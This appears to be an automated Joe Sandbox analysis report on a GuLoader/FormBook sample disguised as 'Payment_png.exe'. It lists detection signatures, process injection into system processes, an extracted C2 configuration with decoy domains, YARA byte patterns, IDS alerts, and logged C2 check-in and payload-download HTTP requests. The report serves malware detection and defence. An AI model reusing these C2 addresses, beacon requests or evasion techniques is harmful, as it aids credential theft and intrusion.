Play interactive tour

Edit tour

Analysis Report Payment_png.exe

Overview

General Information

Sample Name:	Payment_png.exe
Analysis ID:	377352
MD5:	86fa26e33879d3c04152301eaaaba518
SHA1:	3c75755b8efe897bb18ea99f6014dabd5492d32c
SHA256:	eacf1b7b8d612e5a500f79a03b06f9fb919768a1fb053ce3522f3288c36067f4
Tags:	GuLoader
Infos:
Most interesting Screenshot:

Detection

FormBook GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

Yara detected Generic Dropper

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Contains functionality to hide a thread from the debugger

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Executable has a suspicious name (potential lure to open the executable)

Hides threads from debuggers

Initial sample is a PE file and has a suspicious name

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Yara detected VB6 Downloader Generic

Abnormal high CPU Usage

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

Payment_png.exe (PID: 6076 cmdline: 'C:\Users\user\Desktop\Payment_png.exe' MD5: 86FA26E33879D3C04152301EAAABA518)

Payment_png.exe (PID: 3112 cmdline: 'C:\Users\user\Desktop\Payment_png.exe' MD5: 86FA26E33879D3C04152301EAAABA518)

explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

colorcpl.exe (PID: 2988 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)

cmd.exe (PID: 1536 cmdline: /c del 'C:\Users\user\Desktop\Payment_png.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 1560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.booksfall.com/c8bs/"], "decoy": ["dreamwrldrp.com", "epkshu.com", "accinf5.com", "karadenizturk.com", "pcpartout.com", "kuwoopi.com", "gtaqcf.com", "lambofgodprinting.com", "vinelytv.com", "domennyarendi39.net", "broskiusa.com", "bombiepalaboy.com", "plowbrothers.com", "domentemenegi42.net", "jfhousebuyers.com", "birkenhof-allgaeu.net", "quantify-co.com", "bitoko.net", "choupisson.com", "bostonm.info", "wojkowski.com", "themersy.com", "structuredmen.net", "jadaccaentertainment.com", "strategyplace.net", "kadyshopping.com", "bookhangovers.com", "peopleskillschallenge.com", "sturestaypluspdx.com", "nxywsy.com", "citestaccnt1598622913.com", "bestmodestorestaurants.com", "thebabyfriendly.com", "aainakari.com", "cookklip.com", "8bitupgrades.com", "smartintegrityplatform.com", "silverdollarcafe.com", "obleaslaoriginal.com", "csfeliz.com", "selfmadepartners.com", "djmacktruck.com", "madefaz.net", "55zhidian.com", "slutefuter.com", "enternet360.com", "autoandtruckpartsincoh.com", "loversdeal.com", "windorians.com", "skinsbag.com", "indounace-maisounce.com", "atxrealestateforsale.com", "lotdco.com", "littlewanda.com", "epc-scot.com", "thesaltybookkeeper.com", "neebcoteam.com", "uforservice.com", "cashcanbeyours.com", "bondar.design", "rwpgoyiof.club", "mindfulreadings.com", "dhadaka.com", "aartihand.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
0000000E.00000002.472974211.0000000005117000.00000004.00000001.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x4368:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
0000000E.00000002.470737147.0000000003032000.00000004.00000020.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x41c0:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: colorcpl.exe PID: 2988	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Process Memory Space: Payment_png.exe PID: 3112	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Process Memory Space: Payment_png.exe PID: 3112	JoeSecurity_VB6DownloaderGeneric	Yara detected VB6 Downloader Generic	Joe Security
Process Memory Space: Payment_png.exe PID: 3112	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Process Memory Space: Payment_png.exe PID: 6076	JoeSecurity_VB6DownloaderGeneric	Yara detected VB6 Downloader Generic	Joe Security
Process Memory Space: Payment_png.exe PID: 6076	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Click to see the 18 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.booksfall.com/c8bs/"], "decoy": ["dreamwrldrp.com", "epkshu.com", "accinf5.com", "karadenizturk.com", "pcpartout.com", "kuwoopi.com", "gtaqcf.com", "lambofgodprinting.com", "vinelytv.com", "domennyarendi39.net", "broskiusa.com", "bombiepalaboy.com", "plowbrothers.com", "domentemenegi42.net", "jfhousebuyers.com", "birkenhof-allgaeu.net", "quantify-co.com", "bitoko.net", "choupisson.com", "bostonm.info", "wojkowski.com", "themersy.com", "structuredmen.net", "jadaccaentertainment.com", "strategyplace.net", "kadyshopping.com", "bookhangovers.com", "peopleskillschallenge.com", "sturestaypluspdx.com", "nxywsy.com", "citestaccnt1598622913.com", "bestmodestorestaurants.com", "thebabyfriendly.com", "aainakari.com", "cookklip.com", "8bitupgrades.com", "smartintegrityplatform.com", "silverdollarcafe.com", "obleaslaoriginal.com", "csfeliz.com", "selfmadepartners.com", "djmacktruck.com", "madefaz.net", "55zhidian.com", "slutefuter.com", "enternet360.com", "autoandtruckpartsincoh.com", "loversdeal.com", "windorians.com", "skinsbag.com", "indounace-maisounce.com", "atxrealestateforsale.com", "lotdco.com", "littlewanda.com", "epc-scot.com", "thesaltybookkeeper.com", "neebcoteam.com", "uforservice.com", "cashcanbeyours.com", "bondar.design", "rwpgoyiof.club", "mindfulreadings.com", "dhadaka.com", "aartihand.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: Payment_png.exe	Virustotal: Detection: 70%	Perma Link
Source: Payment_png.exe	Metadefender: Detection: 19%	Perma Link
Source: Payment_png.exe	ReversingLabs: Detection: 79%

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp, type: MEMORY

Source: 14.2.colorcpl.exe.30327b8.2.unpack	Avira: Label: TR/Dropper.Gen
Source: 14.2.colorcpl.exe.5117960.5.unpack	Avira: Label: TR/Dropper.Gen

Source: Payment_png.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown

HTTPS traffic detected: 170.249.199.106:443 -> 192.168.2.3:49714 version: TLS 1.2

Source:	Binary string: colorcpl.pdbGCTL source: Payment_png.exe, 00000002.00000002.305994163.00000000000B0000.00000040.00000001.sdmp
Source:	Binary string: colorcpl.pdb source: Payment_png.exe, 00000002.00000002.305994163.00000000000B0000.00000040.00000001.sdmp
Source:	Binary string: MusNotifyIcon.pdb source: explorer.exe, 00000006.00000000.294257037.000000000F785000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.294003338.000000000E350000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: Payment_png.exe, 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, colorcpl.exe, 0000000E.00000002.471234758.0000000004BE0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Payment_png.exe, colorcpl.exe
Source:	Binary string: MusNotifyIcon.pdbGCTL source: explorer.exe, 00000006.00000000.294257037.000000000F785000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.294003338.000000000E350000.00000002.00000001.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49734 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49734 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49734 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49736 -> 172.67.184.37:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49736 -> 172.67.184.37:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49736 -> 172.67.184.37:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 35.246.6.109:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 35.246.6.109:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 35.246.6.109:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 217.160.0.233:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 217.160.0.233:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 217.160.0.233:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 23.227.38.32:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 23.227.38.32:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 23.227.38.32:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.booksfall.com/c8bs/

Source: global traffic	HTTP traffic detected: GET /c8bs/?oX=mHnwrZz1sKQS3zf7QeEgVUMWoZ3Lc4fpOuayWuCDpyWMt82/PBRmHPawc0L3Kfl51U/x&sPj0qt=EzuD_nNPa4wlp HTTP/1.1Host: www.plowbrothers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /c8bs/?oX=Hv8f/9kM6PpCoHCAYeSNySFtV7F8Omi3vFEIW08Kt8pLNhhDl+aE5MaGg51EV/qSy4Lt&sPj0qt=EzuD_nNPa4wlp HTTP/1.1Host: www.loversdeal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /c8bs/?oX=mCtx4UHL9mNzF3EVU4c9VHavM1DFjubq04c/5ShdsOuIyPGtiFj7akTOwHhyuxeIGqkY&sPj0qt=EzuD_nNPa4wlp HTTP/1.1Host: www.pcpartout.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /c8bs/?oX=LeA7SnvTFXlqZuqbSI7RL/JE3Y5e3FfIcVn/p/TMp/5vx2Fx/wjFaW5mPJS2e1LpHtn7&sPj0qt=EzuD_nNPa4wlp HTTP/1.1Host: www.birkenhof-allgaeu.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /c8bs/?oX=VA+RheUhnH6IZbm+U8Y2mzCnWc09b3JHiGFV6nsBhBIaDv1TGDBDOGhITueAfFfv+F2O&sPj0qt=EzuD_nNPa4wlp HTTP/1.1Host: www.choupisson.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /c8bs/?oX=O8PbLgx16hMIOJ1rZ9qRlhWRXDOrjvK9cMkfWsk/HAIbj7Mo3Z6p/LmWsoKge1OKT5Rd&sPj0qt=EzuD_nNPa4wlp HTTP/1.1Host: www.uforservice.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /c8bs/?oX=9WVnx7W/2jtf/SBQb7qMRqW55HQP5AXdTxivKH+RIJcLuGeyWux88wPL6knHSRGt/sw8&sPj0qt=EzuD_nNPa4wlp HTTP/1.1Host: www.silverdollarcafe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 198.54.117.218 198.54.117.218
Source: Joe Sandbox View	IP Address: 23.227.38.32 23.227.38.32
Source: Joe Sandbox View	IP Address: 23.227.38.32 23.227.38.32

Source: Joe Sandbox View	ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View	ASN Name: BIZLAND-SDUS BIZLAND-SDUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /bin_BNUtTDfY243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: aps-mm.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /bin_BNUtTDfY243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: www.aps-mm.comConnection: Keep-Alive

Source: C:\Windows\explorer.exe

Code function: 6_2_0613D302 getaddrinfo,setsockopt,recv,

6_2_0613D302

Source: global traffic	HTTP traffic detected: GET /bin_BNUtTDfY243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: aps-mm.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /bin_BNUtTDfY243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: www.aps-mm.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /c8bs/?oX=mHnwrZz1sKQS3zf7QeEgVUMWoZ3Lc4fpOuayWuCDpyWMt82/PBRmHPawc0L3Kfl51U/x&sPj0qt=EzuD_nNPa4wlp HTTP/1.1Host: www.plowbrothers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /c8bs/?oX=Hv8f/9kM6PpCoHCAYeSNySFtV7F8Omi3vFEIW08Kt8pLNhhDl+aE5MaGg51EV/qSy4Lt&sPj0qt=EzuD_nNPa4wlp HTTP/1.1Host: www.loversdeal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /c8bs/?oX=mCtx4UHL9mNzF3EVU4c9VHavM1DFjubq04c/5ShdsOuIyPGtiFj7akTOwHhyuxeIGqkY&sPj0qt=EzuD_nNPa4wlp HTTP/1.1Host: www.pcpartout.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /c8bs/?oX=LeA7SnvTFXlqZuqbSI7RL/JE3Y5e3FfIcVn/p/TMp/5vx2Fx/wjFaW5mPJS2e1LpHtn7&sPj0qt=EzuD_nNPa4wlp HTTP/1.1Host: www.birkenhof-allgaeu.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /c8bs/?oX=VA+RheUhnH6IZbm+U8Y2mzCnWc09b3JHiGFV6nsBhBIaDv1TGDBDOGhITueAfFfv+F2O&sPj0qt=EzuD_nNPa4wlp HTTP/1.1Host: www.choupisson.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /c8bs/?oX=O8PbLgx16hMIOJ1rZ9qRlhWRXDOrjvK9cMkfWsk/HAIbj7Mo3Z6p/LmWsoKge1OKT5Rd&sPj0qt=EzuD_nNPa4wlp HTTP/1.1Host: www.uforservice.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /c8bs/?oX=9WVnx7W/2jtf/SBQb7qMRqW55HQP5AXdTxivKH+RIJcLuGeyWux88wPL6knHSRGt/sw8&sPj0qt=EzuD_nNPa4wlp HTTP/1.1Host: www.silverdollarcafe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: aps-mm.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 29 Mar 2021 11:59:43 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: Payment_png.exe, 00000002.00000002.306035151.0000000000561000.00000040.00000001.sdmp	String found in binary or memory: http://aps-mm.com/bin_BNUtTDfY243.bin
Source: explorer.exe, 00000006.00000000.294226634.000000000F740000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.aainakari.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.aainakari.com/c8bs/
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.aainakari.com/c8bs/www.bostonm.info
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.aainakari.comReferer:
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.accinf5.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.accinf5.com/c8bs/
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.accinf5.com/c8bs/www.silverdollarcafe.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.accinf5.comReferer:
Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.birkenhof-allgaeu.net
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.birkenhof-allgaeu.net/c8bs/
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.birkenhof-allgaeu.net/c8bs/www.choupisson.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.birkenhof-allgaeu.netReferer:
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.booksfall.com
Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmp	String found in binary or memory: http://www.booksfall.com/c8bs/
